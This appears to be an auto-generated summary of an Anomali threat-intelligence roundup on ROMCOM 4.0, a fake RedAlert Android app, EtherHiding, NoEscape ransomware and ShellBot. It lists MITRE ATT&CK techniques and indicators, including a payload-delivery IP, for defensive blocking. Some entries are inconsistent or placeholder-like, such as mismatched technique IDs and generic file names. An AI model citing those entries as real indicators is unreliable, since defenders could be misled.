Anomali Cyber Watch I Cyber Security News on Latest Threats

Anomali’s Cyber Watch roundup covers multiple campaigns including ROMCOM 4.0 (PEAPOD) backdoors targeting defense and government sectors, a typosquatted RedAlert Android infostealer, EtherHiding via blockchain hosting, the NoEscape ransomware, and ShellBot DDoS using hexadecimal IP notation. The piece outlines observed techniques, indicators, and defensive notes, directing readers to block or monitor related artifacts in their infrastructure. hashtags: #ROMCOM #PEAPOD #RedAlert #EladNava #EtherHiding #ClearFake #BinanceSmartChain #WordPress #NoEscape #ShellBot #HexadecimalIP

Keypoints

ROMCOM 4.0 (PEAPOD) is a streamlined backdoor delivery with modular components downloaded as needed, used against conferences and government targets in Europe, with extensive MITRE mappings.
RedAlert by Elad Nava is a typosquatted Android app impersonation designed to exfiltrate sensitive device data via encrypted channels.
EtherHiding ties malicious code to Web3 and Binance Smart Chain, leveraging WordPress weaknesses and smart-contract payloads to deliver infostealers like Amadey, Lumma, or RedLine.
NoEscape ransomware operates as a RaaS with double extortion, DDoS, and flexible geographic targeting, citing extensive MITRE mappings across initial access, persistence, and defense evasion.
ShellBot DDoS malware uses a hexadecimal IP notation for its download URL, illustrating a novel evasion/obfuscation technique and IRC-based C2 behavior.
Across campaigns, indicators (domains, files, and artifacts) are available in Anomali for blocking and monitoring, underscoring the value of threat intelligence platforms.

MITRE Techniques

[T1105] Command and Control – Remote File Copy – ROMCOM 4.0 components are downloaded as needed. “Command and Control – Remote File Copy [T1105]”
[T1027] Obfuscated Files or Information – ROMCOM/ROMCOM 4.0 uses obfuscated data and loaders. “Defense Evasion – Obfuscated Files or Information [T1027]”
[T1140] Deobfuscate/Decode Files or Information – ROMCOM 4.0 uses deobfuscation steps. “Defense Evasion – Deobfuscate/Decode Files or Information [T1140]”
[T1546.015] Event Triggered Execution: Component Object Model Hijacking – ROMCOM 4.0 includes event-triggered execution techniques. “Event Triggered Execution: Component Object Model Hijacking”
[T1082] System Information Discovery – ROMCOM/romcom-related discovery of system information. “Picus: The System Information Discovery Technique Explained – MITRE ATT&CK T1082”
[T1005] Data from Local System – ROMCOM/PEAPOD collects data from local system. “Data from Local System [T1005]”
[T1070.004] Indicator Removal: File Deletion – ROMCOM/PEAPOD indicators include file deletion traces. “Indicator Removal: File Deletion [T1070.004]”
[T1070.009] Indicator Removal: Clear Persistence – ROMCOM/PEAPOD indicators include persistence-clearing steps. “Indicator Removal: Clear Persistence [T1070.009]”
[T1633] Virtualization/Sandbox Evasion – RedAlert typosquatting app uses sandbox checks. “Virtualization/Sandbox Evasion [T1633]”
[T1633.001] Virtualization/Sandbox Evasion: System Checks – RedAlert variant employs system checks to evade analysis. “Virtualization/Sandbox Evasion: System Checks [T1633.001]”
[T1424] Process Discovery – RedAlert-related behavior includes process discovery. “Process Discovery [T1424]”
[T1426] System Information Discovery – RedAlert-related data collection includes system info. “System Information Discovery [T1426]”
[T1533] Data From Local System – RedAlert collects local data. “Data From Local System [T1533]”
[T1521.002] Encrypted Channel: Asymmetric Cryptography – RedAlert uses encrypted channels. “Encrypted Channel: Asymmetric Cryptography [T1521.002]”
[T1437.001] Application Layer Protocol: Web Protocols – RedAlert uses web protocols for C2. “Application Layer Protocol: Web Protocols [T1437.001]”
[T1646] Exfiltration Over C2 Channel – RedAlert exfiltrates data over C2. “Exfiltration Over C2 Channel [T1646]”
[T1078] Valid Accounts – EtherHiding and related activity rely on valid accounts. “Valid Accounts [T1078]”
[T1190] Initial Access – Exploit Public-Facing Application – EtherHiding uses public-facing apps. “Initial Access – Exploit Public-Facing Application [T1190]”
[T1105] Command and Control – Remote File Copy – EtherHiding payload delivery via remote copy. “Remote File Copy [T1105]”
[T1027] Obfuscated Files or Information – EtherHiding data obfuscation. “Obfuscated Files or Information [T1027]”
[T1140] Deobfuscate/Decode Files or Information – EtherHiding payload decoding. “Deobfuscate/Decode Files or Information [T1140]”
[T1555] Credentials From Password Stores – EtherHiding credential access via password stores. “Credentials From Password Stores [T1555]”
[T1133] External Remote Services – NoEscape uses external remote services. “External Remote Services [T1133]”
[T1078] Valid Accounts – NoEscape uses valid accounts for persistence. “Valid Accounts [T1078]”
[T1204] User Execution – NoEscape uses user execution for infection vectors. “User Execution [T1204]”
[T1053.005] LOLBin – Scheduled Tasks – NoEscape LOLBin usage. “Scheduled Tasks (T1053.005)””
[T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – NoEscape persistence. “Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001]”
[T1562.001] Disable or Modify Tools – NoEscape disables or modifies tools. “Disable or Modify Tools [T1562.001]”
[T1027] Obfuscated Files or Information – NoEscape obfuscation. “Obfuscated Files or Information [T1027]”
[T1055] Process Injection – NoEscape uses process injection. “Process Injection [T1055]”
[T1070.004] Indicator Removal: File Deletion – NoEscape deletes traces. “Indicator Removal: File Deletion [T1070.004]”
[T1112] Modify Registry – NoEscape modifies registry. “Modify Registry [T1112]”
[T1140] Deobfuscate/Decode Files or Information – NoEscape deobfuscation steps. “Deobfuscate/Decode Files or Information [T1140]”
[T1497.001] System Checks – NoEscape virtualization/system checks. “System Checks [T1497.001]”
[T1003] OS Credential Dumping – NoEscape credential access. “OS Credential Dumping [T1003]”
[T1482] Domain Trust Discovery – NoEscape discovery of domain trusts. “Domain Trust Discovery [T1482]”
[T1069] Permission Groups Discovery – NoEscape group discovery. “Permission Groups Discovery [T1069]”
[T1021.001] Remote Services: Remote Desktop Protocol – NoEscape lateral movement via RDP. “Remote Services: Remote Desktop Protocol [T1021.001]”
[T1560.001] Archive Collected Data: Archive Via Utility – NoEscape data archiving. “Archive Via Utility [T1560.001]”
[T1071.001] Application Layer Protocol: Web Protocols – NoEscape C2 web protocols. “Application Layer Protocol: Web Protocols [T1071.001]”
[T1567.002] Exfiltration To Cloud Storage – NoEscape exfiltration to cloud storage. “Exfiltration To Cloud Storage [T1567.002]”
[T1498] Network Denial Of Service – ShellBot DDoS activity. “Network Denial Of Service [T1498]”
[T1027] Obfuscated Files or Information – ShellBot obfuscation. “Obfuscated Files or Information [T1027]”
[T1078.001] Valid Accounts: Default Accounts – ShellBot uses default accounts. “Valid Accounts: Default Accounts [T1087.001]”

Indicators of Compromise

[IOC Type] IP Address – 39.99.218.78 (derived from 0x2763da4e) used in ShellBot DDoS payload delivery
[IOC Type] File Name – malicious.exe, encrypted.dll, icon.ico – ROMCOM 4.0 download chain involves a malicious EXE that downloads an XOR-encrypted DLL and a small icon
[IOC Type] File Type – EXE, DLL, ICO – Observed in ROMCOM/PEAPOD and related components
[IOC Type] Domain/URL – typosquatted domains referenced in campaigns (not explicitly named in the article)
[IOC Type] Crypto/Algorithm – AES in CBC with PKCS5 padding and RSA in transit/at rest used by RedAlert-style apps (context mentions encryption and key handling)
[IOC Type] Hardware/Platform – Binance Smart Chain, WordPress targets (context mentions hosting and platform targets)

Anomali Cyber Watch I Cyber Security News on Latest Threats | Anomali